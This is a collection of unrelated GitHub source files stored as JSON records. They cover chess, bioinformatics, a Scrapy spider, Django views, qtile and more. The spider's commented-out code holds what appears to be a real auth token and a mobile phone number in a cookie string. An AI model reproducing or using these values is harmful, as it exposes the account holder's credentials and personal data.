+{"seq_id":"16062301351","text":"class Piece():\n    def __init__(self, piecetype, side, alive=True):\n        self.piecetype = piecetype\n        self.side = side\n        self.alive = alive\n\nclass Board():\n    def __init__(self):\n        background = [[0 for i in range(8)] for j in range(8)]\n        toggle = True\n        for i in range(8):\n            if i%2 == 1:\n                toggle = False\n            else:\n                toggle = True\n            for j in range(8):\n                if toggle:\n                    toggle = False\n                else:\n                    background[i][j] = 1\n                    toggle = True\n        self.board = background\n    def create_pieces(self):\n        # store the pieces on the instance so that set_board() can reach them\n        # (as plain locals they were lost when this method returned, and\n        # set_board() raised a NameError); knights use \"n\" so \"k\" stays the king\n        self.wRook1 = Piece(\"r\",\"w\")\n        self.wRook2 = Piece(\"r\", \"w\")\n        self.wKnight1 = Piece(\"n\", \"w\")\n        self.wKnight2 = Piece(\"n\", \"w\")\n        self.wBishop1 = Piece(\"b\", \"w\")\n        self.wBishop2 = Piece(\"b\", \"w\")\n        self.wQueen = Piece(\"q\", \"w\")\n        self.wKing = Piece(\"k\", \"w\")\n        self.bRook1 = Piece(\"r\",\"b\")\n        self.bRook2 = Piece(\"r\", \"b\")\n        self.bKnight1 = Piece(\"n\", \"b\")\n        self.bKnight2 = Piece(\"n\", \"b\")\n        self.bBishop1 = Piece(\"b\", \"b\")\n        self.bBishop2 = Piece(\"b\", \"b\")\n        self.bQueen = Piece(\"q\", \"b\")\n        self.bKing = Piece(\"k\", \"b\")\n        self.wPawn1 = Piece(\"p\",\"w\")\n        self.wPawn2 = Piece(\"p\",\"w\")\n        self.wPawn3 = Piece(\"p\",\"w\")\n        self.wPawn4 = Piece(\"p\",\"w\")\n        self.wPawn5 = Piece(\"p\",\"w\")\n        self.wPawn6 = Piece(\"p\",\"w\")\n        self.wPawn7 = Piece(\"p\",\"w\")\n        self.wPawn8 = Piece(\"p\",\"w\")\n        self.bPawn1 = Piece(\"p\",\"b\")\n        self.bPawn2 = Piece(\"p\",\"b\")\n        self.bPawn3 = Piece(\"p\",\"b\")\n        self.bPawn4 = Piece(\"p\",\"b\")\n        self.bPawn5 = Piece(\"p\",\"b\")\n        self.bPawn6 = Piece(\"p\",\"b\")\n        self.bPawn7 = Piece(\"p\",\"b\")\n        self.bPawn8 = Piece(\"p\",\"b\")\n    def set_board(self):\n        board_state = [['' for i in range(8)] for i in range(8)]\n        # each back-rank square gets its own piece (the second bishop, knight\n        # and rook were previously duplicates of the first)\n        board_state[0][0] = self.bRook1\n        board_state[0][1] = self.bKnight1\n        board_state[0][2] = self.bBishop1\n        board_state[0][3] = self.bQueen\n        board_state[0][4] = self.bKing\n        board_state[0][5] = self.bBishop2\n        board_state[0][6] = self.bKnight2\n        board_state[0][7] = self.bRook2\n        board_state[7][0] = self.wRook1\n        board_state[7][1] = self.wKnight1\n        board_state[7][2] = self.wBishop1\n        board_state[7][3] = self.wQueen\n        board_state[7][4] = self.wKing\n        board_state[7][5] = self.wBishop2\n        board_state[7][6] = self.wKnight2\n        board_state[7][7] = self.wRook2\n        print(board_state)\n\n\n\n\n\nnewBoard = Board()\nprint(newBoard.board)\nnewBoard.create_pieces()\nnewBoard.set_board()\n","repo_name":"tartlet/Chess","sub_path":"bones.py","file_name":"bones.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"34986319353","text":"#!/usr/bin/env python\n\n###################################################\n###  Structural Features Background Generation  ###\n###  Written by: Nicole Zatorski                ###\n###  Last date modified: 22/7/22                ###\n###################################################\n\n# import statements\nimport sys\nimport os\nimport glob\n\n# functions\ndef write_output(out_name, out_str):\n    '''\n    Appends the out_str to the end of the file described by out_name\n    Inputs:\n        out_name: (str) path and name of file to write to\n        out_str: (str) information to append to the end of the file\n    Outputs:\n        None\n    '''\n    f = open(out_name, 'a+')\n    f.write(out_str)\n    f.close()\n\ndef make_background(input_folder, file_id, output_dir_name):\n    '''\n    Converts the output from structural features into background that structural features can use\n    Inputs:\n        input_folder: (str) path where to find the file the background will be generated from\n        file_id: (str) name of the file the background will be generated from\n        output_dir_name: (str) path and name of file to write to, doesn't need to already exist but can\n    Outputs:\n        1 (int) when complete\n    '''\n    if not os.path.exists('./databases/'+output_dir_name + '/'):\n        os.makedirs('./databases/'+output_dir_name + '/')\n    output_dir = './databases/'+output_dir_name + '/'\n    out_average = ''\n    index = 0\n    with open(input_folder + '/average_'+file_id+'.csv') as fo:\n        for line in fo:\n            if index != 0:\n                split_line = line[:-1].split(',')\n                out_average = out_average + split_line[0] + ',' + split_line[1] + ',' + split_line[2] + '\n'\n            index +=1\n    frequency = ''\n    domain = ''\n    fam = ''\n    superfam =''\n    fold = ''\n    with open(input_folder + '/frequency_'+file_id+'.csv') as fo:\n        for line in fo:\n            split_line = line[:-1].split(',')\n            if split_line[2] == 'N/A':\n                frequency = frequency + split_line[1] + ',' + split_line[3] + '\n'\n            elif split_line[2] == 'domain':\n                domain = domain + split_line[0] + ',' + split_line[3] + '\n'\n            elif split_line[2] == 
'fold':\n fold = fold + split_line[0] + ',' + split_line[3] + '\\n'\n elif split_line[2] == 'family':\n fam = fam + split_line[0] + ',' + split_line[3] + '\\n'\n elif split_line[2] == 'superfamily':\n superfam = superfam + split_line[0] + ',' + split_line[3] + '\\n'\n write_output(output_dir +'average_background.csv' ,out_average)\n write_output(output_dir +'frequency_background.csv' ,frequency)\n write_output(output_dir +'scop.fold.csv' ,fold)\n write_output(output_dir +'ipr.domain.csv' ,domain)\n write_output(output_dir +'scop.family.csv' ,fam)\n write_output(output_dir +'scop.superfam.csv' ,superfam)\n\n return 1\n\nif __name__ == '__main__':\n make_background('prot_backout_cmap', 'prot_over', 'prot_over')\n make_background('prot_backout_cmap', 'prot_under', 'prot_under')\n # make_background('norm_breast', 'gtex_breast', 'gtex_breast250')\n # make_background(*sys.argv[1:])\n # make_background('nonbreast_gtex_out/', 'all_ids', 'updated_human_background')\n # files = glob.glob('rna_backout/*normal*')\n\n # # files = glob.glob('proteomics_backout/*')\n # for f in files:\n # # id = f.split('_')[-1].split('.')[0]\n # # make_background('proteomics_backout', id, id)\n\n\n # id = f.split('_')[-1].split('-')[0]\n # make_background('rna_backout', id+'-normal-tissue', id)","repo_name":"schlessinger-lab/structural_features","sub_path":"make_background.py","file_name":"make_background.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24067655270","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request,FormRequest\nfrom tycproject.items import CompanyNameItem\nfrom scrapy.http.cookies import CookieJar\n\n\n\nclass TycSpider(scrapy.Spider):\n name = 'tycSpider'\n custom_settings = {\n 'DOWNLOAD_DELAY': 2,\n 'COOKIES_ENABLED' : False,\n 'DOWNLOADER_MIDDLEWARES':{\n 'tycproject.middlewares.SeleniumMiddleware': 543,\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None\n },\n # 'ITEM_PIPELINES':{\n # 'tycproject.mongodbPipelines.MongodbPipeline_Qiye58':300,\n # },\n #\n #\n }\n #\n # headers = {\n # 'Connection': 'keep - alive',\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n # 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n # 'Referer':'https://www.tianyancha.com/',\n # 'Accept-Encoding':'gzip, deflate, br',\n # 'Accept-Language':'zh-CN,zh;q=0.9'\n # }\n # cookie_jar = CookieJar()\n\n def start_requests(self):\n url = 'https://www.tianyancha.com/'\n for i in range(1,2):\n yield Request(url, meta = {'usedSelenium': True,},callback = self.parse)\n\n def parse(self, response):\n # self.cookie_jar.extract_cookies(response, response.request)\n html=BeautifulSoup(response.text,'lxml')\n a=html.find(class_='right tyc-nav ')\n # print('~~~~~~~~~~~~~`~~~~~~~~~~~~~~~')\n # print(a)\n # print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n # cookies=response.request.cookies\n # 
cookies['tyc-user-info']='%257B%2522token%2522%253A%2522eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxODg5ODQwMDQ5NiIsImlhdCI6MTUzNzQyMjU2OSwiZXhwIjoxNTUyOTc0NTY5fQ.P2mZ8kCQKPhVlzxNpRDeBkDafxAA4HTxMC3Hs8Sj0fSGmIZrSjo_8LsnQpm_ZkCHZO8QoBeqf_GpqQtHFS8zTA%2522%252C%2522integrity%2522%253A%25220%2525%2522%252C%2522state%2522%253A%25220%2522%252C%2522redPoint%2522%253A%25220%2522%252C%2522vipManager%2522%253A%25220%2522%252C%2522vnum%2522%253A%25220%2522%252C%2522monitorUnreadCount%2522%253A%25221%2522%252C%2522onum%2522%253A%25220%2522%252C%2522mobile%2522%253A%252218898400496%2522%257D'\n    #     cookies['auth_token']='eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxODg5ODQwMDQ5NiIsImlhdCI6MTUzNzQyMjU2OSwiZXhwIjoxNTUyOTc0NTY5fQ.P2mZ8kCQKPhVlzxNpRDeBkDafxAA4HTxMC3Hs8Sj0fSGmIZrSjo_8LsnQpm_ZkCHZO8QoBeqf_GpqQtHFS8zTA'\n    #     yield Request('https://www.tianyancha.com/cd/login.json', meta={'usedSelenium': False},callback=self.qqq,cookies=cookies)\n    # def qqq(self,response):\n    #     print(response.text)\n\n","repo_name":"AFU1718/tyc_test","sub_path":"tycproject/tycSpider.py","file_name":"tycSpider.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"22595740886","text":"from django.db.models import Q\r\nfrom rest_framework import viewsets, mixins\r\nfrom rest_framework.authentication import SessionAuthentication\r\nfrom rest_framework.pagination import PageNumberPagination\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\r\n\r\nfrom order import serializers\r\nfrom order.models import Order, Material\r\nfrom utils.permissions import IsOwnerOrReadOnly\r\nfrom order.choices import Status\r\n\r\n\r\nclass Pagination(PageNumberPagination):\r\n    \"\"\" Base pagination class \"\"\"\r\n    page_size = 10\r\n    page_size_query_param = 'page_size'\r\n    page_query_param = 'page'\r\n    max_page_size = 100\r\n\r\n\r\nclass OrderViewset(viewsets.ModelViewSet):\r\n    \"\"\" Order management: GET query \"\"\"\r\n    permission_classes = (IsAuthenticated, )\r\n    authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n    pagination_class = Pagination\r\n    serializer_class = serializers.OrderSerializer\r\n\r\n    def get_queryset(self):\r\n        query = Q(is_valid=True, status=Status.STATUS_BL)\r\n        customer = self.request.GET.get('customer', None)\r\n        if customer:\r\n            query = query & Q(customer__icontains=customer)\r\n        start_time = self.request.GET.get('start_time', None)\r\n        end_time = self.request.GET.get('end_time', None)\r\n        if start_time and end_time:\r\n            query = query & Q(created_at__range=(start_time, end_time))\r\n        queryset = Order.objects.filter(query)\r\n        return queryset\r\n\r\n\r\nclass OrderViewsetBL(mixins.ListModelMixin, mixins.UpdateModelMixin, viewsets.GenericViewSet):\r\n    \"\"\" Order POST: prepare materials \"\"\"\r\n    permission_classes = (IsAuthenticated, )\r\n    authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n    serializer_class = serializers.OrderSerializer\r\n    queryset = Order.objects.all()\r\n\r\n    def update(self, request, *args, **kwargs):\r\n        instance = self.get_object()\r\n        instance.status = Status.STATUS_PD\r\n        instance.save()\r\n        serializer = self.get_serializer(instance).data\r\n        return Response(serializer)\r\n\r\n\r\nclass MaterialViewset(viewsets.ModelViewSet):\r\n    \"\"\" Material management \"\"\"\r\n    permission_classes = (IsAuthenticated, IsOwnerOrReadOnly)\r\n    authentication_classes = (JSONWebTokenAuthentication, 
SessionAuthentication)\r\n    serializer_class = serializers.MaterialSerializer\r\n\r\n    def get_queryset(self):\r\n        queryset = Material.objects.all()\r\n        return queryset\r\n\r\n\r\nclass OrderViewsetSC(mixins.ListModelMixin, mixins.UpdateModelMixin, viewsets.GenericViewSet):\r\n    \"\"\" Order POST: production-related operations \"\"\"\r\n    permission_classes = (IsAuthenticated, )\r\n    authentication_classes = (JSONWebTokenAuthentication, SessionAuthentication)\r\n    serializer_class = serializers.OrderSerializer\r\n    queryset = Order.objects.all()\r\n\r\n    def update(self, request, *args, **kwargs):\r\n        instance = self.get_object()\r\n        # If the order is not yet in the completed state, advance its status by 1\r\n        if instance.status != Status.STATUS_DDWC:\r\n            instance.status += 1\r\n        instance.save()\r\n        serializer = self.get_serializer(instance).data\r\n        return Response(serializer)\r\n","repo_name":"xxcfun/mes_api","sub_path":"apps/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"25791565891","text":"import numpy as np\n\nfrom .tensor_field import TensorField\n\n\nclass ScalarField(TensorField):\n\n    def __new__(cls, value, param):\n        obj = super().__new__(cls, value, param)\n        rank = len(obj.shape) - len(obj.param.shape) + 1\n        if rank > 1:\n            raise ValueError(\n                f\"Value is not scalar but rank {rank}\")\n        elif rank == 1:\n            obj = super().__new__(cls, value[0], param)\n        return obj\n\n    def calculate_gradient(self):\n        \"\"\"Calculate gradient.\n\n        Return:\n            VectorField object.\n        \"\"\"\n        if 'gradient' in self.attributes:\n            return self.attributes['gradient']\n        diff1 = self.differentiate(order=1)\n        grad = VectorField(\n            np.concatenate([[d] for i, d in enumerate(diff1.values())]),\n            param=self.param)\n        self.attributes['gradient'] = grad\n        return grad\n\n\nclass VectorField(TensorField):\n\n    def __new__(cls, value, param):\n        obj = super().__new__(cls, value, param)\n        rank = len(obj.shape) - len(obj.param.shape) + 1\n        if rank != 1:\n            raise ValueError(f\"Value is not rank 1 but rank {rank}\")\n        return obj\n\n    def calculate_norm(self):\n        \"\"\"Calculate norm.\n\n        Return:\n            ScalarField object.\n        \"\"\"\n        if 'norm' in self.attributes:\n            return self.attributes['norm']\n        norm = ScalarField(\n            np.linalg.norm(self, axis=0, keepdims=True), param=self.param)\n        self.attributes['norm'] = norm\n        return norm\n\n\nclass MatrixField(TensorField):\n\n    def __new__(cls, value, param):\n        obj = super().__new__(cls, value, param)\n        rank = len(obj.shape) - len(obj.param.shape) + 1\n        if rank != 2:\n            raise ValueError(f\"Value is not rank 2 but rank {rank}\")\n        return obj\n\n    def calculate_determinant(self):\n        if 'determinant' in self.attributes:\n            return self.attributes['determinant']\n        det = ScalarField(np.linalg.det(self.transpose()), param=self.param)\n        self.attributes['determinant'] = det\n        return det\n","repo_name":"yellowshippo/geomulator","sub_path":"geomulator/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18365648815","text":"from django.conf.urls import url\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n    url(r'^$', views.index),\r\n    url(r'^details/(?P<pk>[0-9]+)$', views.DogDetailView.as_view(),name='dogdetails'),\r\n    url(r'^reg2/', views.register),\r\n    url(r'^dogls/', views.DogLsView.as_view()),\r\n    url(r'^dognew/', views.DogCreateView.as_view()),\r\n    url(r'^dogupd/(?P<pk>[0-9]+)',views.DogUpdateView.as_view()),\r\n    url(r'^dogmix/(?P<pk>[0-9]+)',views.DogMixView.as_view()),\r\n\r\n    url(r'^reg/', views.reg),\r\n    url(r'^dogform/', views.dogform),\r\n    url(r'^formset/', views.formset),\r\n\r\n    url(r'^dogs/(?P<pk>[0-9]+)$', views.DogDetailView.as_view())\r\n    ]","repo_name":"tianyi666/DJ","sub_path":"Dj666/vft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31899853802","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 8 12:26:29 2020\n\n@author: youpele\n\"\"\"\n\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt \nfrom statistics import mean\n\ndf_M1 = pd.read_json(\"features_M1_M2.json\")\ndf_M2 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M2_M3.json\")\ndf_M3 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M3_M4.json\")\ndf_M4 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M4_M5.json\")\ndf_M5 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M5_M6.json\")\ndf_M6 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M6_M7.json\")\ndf_M7 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M7_M8.json\")\ndf_M8 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M8_M9.json\")\ndf_M9 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M9_M10.json\")\ndf_M10b = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M10_5_M11.json\")\ndf_M10a = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M10_M10_5.json\")\n\n\n#df = [df_M1, df_M2, df_M3, df_M4, df_M5, df_M6, df_M7, df_M8, df_M9, df_M10a, df_M10b]\ndf_merged = pd.concat([df_M1, df_M2, df_M3, df_M4, df_M5, df_M6, df_M7, df_M8, df_M9, df_M10a, df_M10b], \n                      ignore_index=True)\n\n\ndf_merged_Stempel = df_merged.loc[:, ['max_Stempel_1','min_Stempel_1', 'mean_Stempel_1', \n                                      'max_Stempel_2','min_Stempel_2', 'mean_Stempel_2',\n                                      'max_Stempel_3','min_Stempel_3', 'mean_Stempel_3', \n                                      'max_Stempel_4','min_Stempel_4', 'mean_Stempel_4']]\n\n\nway_to_punch = pd.read_json(\"/Users/youpele/Documents/WZL/final/way_to_punch.json\")\n\n\nthickness_wzl_df = pd.read_json(\"/Users/youpele/Documents/WZL/final/thickness_wzl.json\")\nthickness_wzl_num_thick = thickness_wzl_df.loc[:, ['Number','thickness']]\n\n\nthickness_ibf_df = pd.read_json(\"/Users/youpele/Documents/WZL/final/thickness_ibf.json\")\nthickness_ibf_force = thickness_ibf_df.loc[:, ['entryCoiler_force', 'exitCoiler_force', 'thickness']]\n\n\n\n\n\ndata_digital_coil1 = pd.merge(left = way_to_punch, right = thickness_ibf_force,\n                              left_index = True, right_index = True)\n\ndata_digital_coil2 = pd.merge(left = data_digital_coil1, right = thickness_wzl_num_thick,\n                              left_index = True, right_index = True)\n\n\ndata_digital_coil3 = pd.merge(left = data_digital_coil2, right = df_merged_Stempel,\n                              left_index = True, right_index = True)\n\ndata_digital_coil = data_digital_coil3\n\n\ndata_digital_coil_export = data_digital_coil.to_json(r'/Users/youpele/Documents/WZL/final/080120_task.json')\n\n\ndfffffff= pd.read_json(\"080120_task.json\")\n\n\n\nthickness_ibdway= thickness_ibf_df.loc[:, ['way']]\nthickforce = 
thickness_ibf_df.loc[:, ['exitCoiler_force']]\n\nplt.plot(thickness_ibdway, thickforce)\n\n\n\n\nrow = len(thickness_ibf_df)\n\n\nls = []\nfor s in range(0,2693):\n    ls.append(int(row/2693))\n    \nfor s in ls:\n    df_temp = thickness_ibf_df.iloc[s:int(s+ls[1])]\n    \n\n\nmean([1,2,3])\n\n\n\n\ndef df_split (df, d = 4): \n    \n    '''\n    Takes in a dataframe and a depth and splits the dataframe according to the depth number inputted\n\n    '''\n    \n    row = len(df)\n\n    list_dfs = []\n    \n    ls = []\n    for s in range(0,d):\n        ls.append(int(s/d*row))\n\n    for s in ls:\n        df_temp = df.iloc[s:int(s+ls[1])]\n        #arr = np.array(df_temp)\n        #df_temp = pd.DataFrame(data=arr.flatten())\n        list_dfs.append(df_temp)\n    \n    return list_dfs\n\n\n\n\navg_entry_force = []\navg_exit_force = []\navg_thickness = []\n\n\nthicknesss_ibf = df_split(thickness_ibf_df,2693)\n\n\n#avg_exit_force.append(mean(thicknesss_ibf[i]['exitCoiler_force']))  # scratch line: 'i' is undefined here; kept commented out\n\n\n# columns of interest: 'entryCoiler_force', 'exitCoiler_force', 'thickness'\n\nfor i in range(len(thicknesss_ibf)):\n    avg_entry_force.append(mean(thicknesss_ibf[i]['entryCoiler_force']))\n    avg_exit_force.append(mean(thicknesss_ibf[i]['exitCoiler_force']))\n    avg_thickness.append(mean(thicknesss_ibf[i]['thickness']))\n    \n\nthickness_avg_ibf = pd.DataFrame({\"avg_entry_force\":avg_entry_force,\n                                  \"avg_exit_force\": avg_exit_force,\n                                  \"avg_thickness\": avg_thickness})\n\n\n    \n    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"youpele52/WZL","sub_path":"080120 task.py","file_name":"080120 task.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"38936016951","text":"import os\nimport re\nfrom setuptools import setup\n# parse version from package/module without importing or evaluating the code\n\nwith open('packer/__init__.py') as fh:\n    for line in fh:\n        m = re.search(r\"^__version__ = '(?P<version>[^']+)'$\", line)\n        if m:\n            version = m.group('version')\n            break\n\nsetup(\n    name = 'python-vagrant',\n    version = version,\n    license = 'MIT',\n    description = 'Python bindings for creating Packer virtual machine images.',\n    long_description = open(os.path.join(os.path.dirname(__file__),\n                                         'README.md')).read(),\n    keywords = 'python virtual machine image box packer virtualbox',\n    url = 'https://github.com/kobe6661/python-packer',\n    author = 'Konstantin Benz',\n    author_email = 'konstantin.benz@gmail.com',\n    classifiers = ['License :: OSI Approved :: MIT License',\n                   'Development Status :: 4 - Beta',\n                   'Programming Language :: Python :: 2',\n                   'Programming Language :: Python :: 2.7',\n                   ],\n    packages = ['packer'],\n)","repo_name":"kobe6661/python-packer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"1767541637","text":"f = open(\"validate_filtering.txt\")\nwf = open(\"validate_reformat_ldf.txt\", \"w\")\n# of = open(\"validate_reformat_nlf.txt\", \"w\")\n\nfor line in f:\n    line_item = line.split(' ')\n    if line_item[0] == 'LDF,':\n        ldf_string = line_item[1] \n        ldf_string = ldf_string[:-1]\n        wf.write(f'{ldf_string}\\n')\n    elif line_item[0] == 'NLF,':\n        string = line_item[1] \n        string = string[:-1]\n        # of.write(f'{string}\\n')\n\nwf.close()\n# of.close()\n\n\n 
\n","repo_name":"chang2000/openGraphMatching","sub_path":"examples/result_analysis/extract_validate.py","file_name":"extract_validate.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34041126082","text":"import streamlit as st\n\nfrom src.database import select_db, download_db\n\n\nwith st.spinner(\"Analisando dados.gov.br...\"):\n data = select_db()\n# First selected option\ndata[None] = None\n# Index from None\nstart = list(data.keys()).index(None)\n\nst.title(\"Selecione o banco que deseja baixar\")\noption = st.selectbox(\".\", data.keys(), index=start, label_visibility=\"collapsed\")\n\nif option is not None:\n # Download selected database\n with st.spinner(f\"Baixando {option}...\"):\n st.session_state.option = option\n st.session_state.db = download_db(data[option])\n st.success(f\"Banco de dados armazenado com sucesso\")\n st.balloons()\n","repo_name":"pinheiro-lucas/fluxo-de-carros-df","sub_path":"pages/1_💾_Banco_de_Dados.py","file_name":"1_💾_Banco_de_Dados.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13027230749","text":"import webbrowser\nfrom libqtile import bar, widget, hook, qtile\nfrom libqtile.config import Screen\nfrom widgets import NordVPN\nfrom theme import gruvbox_dark\n\nwidget_defaults = dict(\n font=\"Hack\",\n fontsize=30,\n padding=3,\n)\n\nextension_defaults = widget_defaults.copy()\nreconfigure_screens = True\n\ndefault_screen_widgets = lambda: [\n widget.GroupBox(),\n widget.WindowName(),\n widget.Clock(),\n]\n\ndefault_screen_left_widgets = lambda: [\n widget.CurrentLayoutIcon(),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.GroupBox(\n borderwidth=1,\n disable_drag=True,\n font=\"Hack\",\n highlight_method=\"text\",\n active=gruvbox_dark[\"foreground\"],\n this_current_screen_border=gruvbox_dark[\"yellow\"],\n ),\n widget.Spacer(length=10),\n widget.Spacer(length=bar.STRETCH),\n]\n\ndefault_screen_right_widgets = lambda: [\n widget.WidgetBox(\n widgets=[\n widget.Spacer(length=20),\n widget.WidgetBox(\n widgets=[\n widget.CPU(fmt=\"{}\"),\n widget.Memory(fmt=\" {} \"),\n widget.ThermalSensor(fmt=\" {} \", font=\"Hack Nerd Font\"),\n NordVPN(),\n ],\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Volume(fmt=\" 墳 {}\", font=\"Hack Nerd Font\"),\n widget.Spacer(\n length=10,\n ),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.OpenWeather(\n fmt=\" {} \",\n font=\"Hack Nerd Font\",\n location=\"Florianopolis\",\n format=\"fln: {main_temp} °{units_temperature}\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://wttr.in/florianopolis\"\n )\n },\n ),\n widget.WidgetBox(\n widgets=[\n widget.OpenWeather(\n font=\"Hack Nerd Font\",\n location=\"Amsterdam\",\n format=\"ams: {main_temp} °{units_temperature}\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://wttr.in/amsterdam\"\n )\n },\n ),\n ]\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.Maildir(\n fmt=\"﫮 {}\",\n font=\"Hack Nerd Font\",\n maildir_path=\"~/mail/personal\",\n sub_folders=(\n {\"label\": \"i\", \"path\": \"inbox\"},\n {\"label\": \"a\", \"path\": \"archives\"},\n ),\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\"https://gmail.com\")\n },\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n 
widget.KeyboardLayout(\n configured_keyboards=(\"us\", \"br\"),\n fmt=\" {}\",\n font=\"Hack Nerd Font\",\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Battery(\n format=\" {char} {percent:2.0%} {hour:d}:{min:02d}/{watt:.2f}W\",\n charge_char=\"\",\n discharge_char=\"\",\n font=\"Hack Nerd Font\",\n empty_char=\"\",\n full_char=\"\",\n notify_bellow=20,\n show_short_text=False,\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.Clock(\n format=\"%H:%M:%S\",\n fmt=\" {} \",\n font=\"Hack Nerd Font\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://calendar.google.com/calendar/u/0/r\"\n )\n },\n ),\n widget.Clock(\n format=\"%h %d %Y\",\n fmt=\" {}\",\n font=\"Hack Nerd Font\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://calendar.google.com/calendar/u/0/r\"\n )\n },\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n ]\n )\n]\n\nscreens = [\n Screen(\n top=bar.Bar(\n default_screen_left_widgets()\n + [widget.Spacer(length=bar.STRETCH)]\n + default_screen_right_widgets()\n + [widget.Systray(icon_size=40)],\n size=60,\n margin=8,\n background=gruvbox_dark[\"background\"],\n border_width=[0, 0, 0, 0],\n )\n ),\n Screen(\n top=bar.Bar(\n default_screen_left_widgets()\n + [widget.Spacer(length=bar.STRETCH)]\n + default_screen_right_widgets(),\n size=60,\n margin=8,\n background=gruvbox_dark[\"background\"],\n border_width=[0, 0, 0, 0],\n )\n ),\n Screen(\n top=bar.Bar(\n default_screen_left_widgets()\n + [widget.Spacer(length=bar.STRETCH)]\n + default_screen_right_widgets(),\n size=60,\n margin=8,\n background=gruvbox_dark[\"background\"],\n border_width=[0, 0, 0, 0], # Draw top and bottom borders\n ),\n ),\n]\n\n\n@hook.subscribe.screen_change\ndef on_screens_reconfigured(_):\n qtile.cmd_reload_config()\n","repo_name":"benmezger/dotfiles","sub_path":"dot_config/qtile/screens.py","file_name":"screens.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"72"} +{"seq_id":"4597351787","text":"from autobahn.twisted.websocket import WebSocketServerProtocol, WebSocketServerFactory\nfrom twisted.internet import reactor\n\ntry:\n import upnpy\nexcept ModuleNotFoundError:\n upnpy = None\n\nimport os\nimport simplejson\nimport socket\nimport txaio\n\n\nclass BroadcastServerFactory(WebSocketServerFactory):\n def __init__(self):\n WebSocketServerFactory.__init__(self)\n self.clients = []\n\n def register(self, client):\n if client not in self.clients:\n self.clients.append(client)\n\n def unregister(self, client):\n if client in self.clients:\n self.clients.remove(client)\n\n def publish(self, channel, message, *args, **kwargs):\n payload = simplejson.dumps([\n channel,\n message\n ]).encode('utf-8')\n\n preparedMsg = self.prepareMessage(payload)\n for c in self.clients:\n c.sendPreparedMessage(preparedMsg)\n\n\ndef make_protocol(service):\n class StandaloneServiceProtocol(WebSocketServerProtocol):\n\n def onOpen(self):\n self.factory.register(self)\n service.log.info(\n 'Client {peer} connected (total={total})',\n peer=self.peer,\n total=len(self.factory.clients)\n )\n service.publishManifest()\n 